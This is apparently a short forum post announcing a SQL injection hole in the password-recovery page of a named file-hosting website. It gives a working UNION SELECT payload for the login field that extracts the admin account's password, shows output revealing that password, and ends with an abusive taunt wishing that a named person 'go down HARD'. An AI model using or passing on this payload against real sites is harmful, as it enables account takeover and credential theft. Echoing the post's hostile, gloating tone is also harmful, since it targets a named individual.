  WooooT
| heres a huge hole in the 30gigs.com website.
The vulnerability exists in »www.30gigs.com/getpassword/ page due to lack of validation of user submitted data. Proof of Concept: enter »www.30gigs.com/getpassword/ and copy & paster this code in the Login field, finally submit the form.
not_existant' union select 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where userLogin='admin
it will give an output like below, in which "runsit" corresponds to the password of account "admin" We have sent the password for your not_existant' union select 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where userLogin='admin_at_30gigs.com account to run it
The site has been notified about the vulnerability 2 weeks ago, but no response was taken.
maz is a b i t c h and its tims for him to go down HARD! |